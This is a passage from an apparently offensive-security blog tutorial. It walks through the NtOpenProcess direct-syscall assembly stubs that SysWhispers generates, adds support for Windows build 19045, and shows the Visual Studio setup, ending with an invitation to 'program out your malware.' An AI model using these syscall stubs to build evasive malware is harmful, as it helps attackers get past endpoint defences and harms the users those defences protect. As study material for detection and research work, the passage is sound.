So, we can see from the check being done below that if the Windows version isn't 10, it will jmp NtOpenProcess_SystemCall_Unknown which just contains a singular ret instruction. If the version is Windows 10, then, the function goes on and determines what build version it is to find and use the appropriate SSN. Remember, this is necessary because syscall numbers can change from build to build, and almost definitely from major version to major version.

NtOpenProcess_Check_X_X_XXXX:               ; Check major version. (checking to see if we're on Windows 10 or not)
	cmp dword ptr [rax+118h], 10         
	je  NtOpenProcess_Check_10_0_XXXX   
	jmp NtOpenProcess_SystemCall_Unknown ; if it doesn't detect win 10 it performs an unconditional jmp to NtOpenProcess_SystemCall_Unknown which will just return.

After this version-checking snippet comes the build-verifying/enumerating portion of the code:

NtOpenProcess_Check_10_0_XXXX:              ; Check build number for Windows 10.
	cmp word ptr [rax+120h], 10240
	je  NtOpenProcess_SystemCall_10_0_10240
	cmp word ptr [rax+120h], 10586
	je  NtOpenProcess_SystemCall_10_0_10586
	cmp word ptr [rax+120h], 14393
	je  NtOpenProcess_SystemCall_10_0_14393
	cmp word ptr [rax+120h], 15063
	je  NtOpenProcess_SystemCall_10_0_15063
	cmp word ptr [rax+120h], 16299
	je  NtOpenProcess_SystemCall_10_0_16299
	cmp word ptr [rax+120h], 17134
	je  NtOpenProcess_SystemCall_10_0_17134
	cmp word ptr [rax+120h], 17763
	je  NtOpenProcess_SystemCall_10_0_17763
	cmp word ptr [rax+120h], 18362
	je  NtOpenProcess_SystemCall_10_0_18362
	cmp word ptr [rax+120h], 18363
	je  NtOpenProcess_SystemCall_10_0_18363
	cmp word ptr [rax+120h], 19041
	je  NtOpenProcess_SystemCall_10_0_19041
	cmp word ptr [rax+120h], 19042
	je  NtOpenProcess_SystemCall_10_0_19042
	cmp word ptr [rax+120h], 19043
	je  NtOpenProcess_SystemCall_10_0_19043
	jmp NtOpenProcess_SystemCall_Unknown
	[...]

Depending on which build number the program finds, for example, let's assume that we were on 19043, it would jump to the corresponding section to populate the eax register with the build-specific syscall number:

NtOpenProcess_SystemCall_10_0_19043:        ; Windows 10.0.19043 (21H1)
	mov eax, 0026h
	jmp NtOpenProcess_Epilogue

Once that's been done, it'll jump to the syscall epilogue where our syscall is actually executed before returning:

NtOpenProcess_Epilogue:
	mov r10, rcx
	syscall
	ret
NtOpenProcess ENDP

It rinses and repeats for all the functions that we've generated the code for and that's how SysWhispers (version 1) works! A slight issue you might've noticed (or already know because it was in a callout earlier) is that our build version (19045) isn't there with all the other cool cats. Since we know the core logic behind this program and how it generates files for us and the contents therein, we can simply add our own build to the long list of builds present.

Obviously, manually adding in our own syscalls for every function we've generated using this tool kind of goes against the whole point of this tool since it was created to do all of this for us. However, we're just doing this as a PoC just to get a crystal clear understanding of this tool and its inner workings.

If you try to incorporate these files and your build version isn't present/accounted for in the .asm file, then nothing will happen upon execution because the stubs will ret due to the NtOpenProcess_Check_10_0_XXXX performing the unconditional jmp NtOpenProcess_SystemCall_Unknown instruction. When I first started, this got me and it made me waste a lot of time, so just keep that in mind!

I've butchered and added the following lines so that our build would be included - as well as the syscall numbers we've dumped from earlier:

.code

NtOpenProcess PROC
	mov rax, gs:[60h]                    ; Load PEB into RAX. PEB x64 @ gs:[60h], PEB x32 @ fs[:30h]
NtOpenProcess_Check_X_X_XXXX:                ; PEB->OSMajorVersion
	cmp dword ptr [rax+118h], 10           
	je  NtOpenProcess_Check_10_0_XXXX       
	jmp NtOpenProcess_SystemCall_Unknown ; if not Windows 10, jmp NtOpenProcess_SystemCall_Unknown
NtOpenProcess_Check_10_0_XXXX:               ; PEB->OSBuildNumber
	cmp word ptr [rax+120h], 19045          
	je  NtOpenProcess_SystemCall_10_0_19045
	jmp NtOpenProcess_SystemCall_Unknown ; if not build 19045, jmp NtOpenProcess_SystemCall_Unknown
NtOpenProcess_SystemCall_10_0_19045:         ; Windows 10.0.19045 (22H2) added by ~~headass~~ crow
	mov eax, 0026h
	jmp NtOpenProcess_Epilogue              
NtOpenProcess_SystemCall_Unknown:            ; Unknown/unsupported version.
	ret
NtOpenProcess_Epilogue:
	mov r10, rcx
	syscall                              ; can be replaced w/ legacy int 2eh as well
	ret
NtOpenProcess ENDP

Now, we just rinse and repeat for all of the functions (you really don't have to do this, you could just add in your build without removing them all - but for the sake of space, I'll be doing it this way). Eventually, you'll have a file that looks something like this:

4KB

syswhispers.asm

I've left the syswhispers.h header file intact because aside from adding in our macros for printing, the NTSTATUS STATUS_SUCCESS, etc., it's pretty much the same as our glassBox.h header file, even initializing the _OBJECT_ATTRIBUTES structure with the InitializeObjectAttributes macro):

#ifndef InitializeObjectAttributes
#define InitializeObjectAttributes( p, n, a, r, s ) { \
	(p)->Length = sizeof( OBJECT_ATTRIBUTES );        \
	(p)->RootDirectory = r;                           \
	(p)->Attributes = a;                              \
	(p)->ObjectName = n;                              \
	(p)->SecurityDescriptor = s;                      \
	(p)->SecurityQualityOfService = NULL;             \
}
#endif

Also, instead of using the extern keyword for the function prototypes, the header uses EXTERN_C which is just expands to extern anyways so it's the same thing:

With this finally done. We can at last, just include these two files into our project directory and include them into our solution. Once you've created a project, drag and drop the generated .asm and .h files into the directory where your project is:

We can add these files to our project now:

After pressing Add, you'll see it in your solution explorer pane. Next up, the header file. Same thing as before except we right-click on Header Files and choose the syscalls.h file:

Once that's finally added, we can enable MASM for our project like we did in the assembly portion section. Right-click your project and go to Build Dependencies > Build Customizations. Once the new window pops up, enable masm. After this, right-click on your syscalls.asm file and head to Properties:

With that done, you're golden! You can now add a new source file and program out your malware.

I hope you can see why I waited until the last moment to show this tool off. I'm a firm believer in at least manually doing something a couple of times before relying on a tool to do it for you - since that way, you understand what's going on under the hood and can troubleshoot much easier should something break or go wrong. Either way, this blog has been going on for long enough - till next time, see ya later (nerd).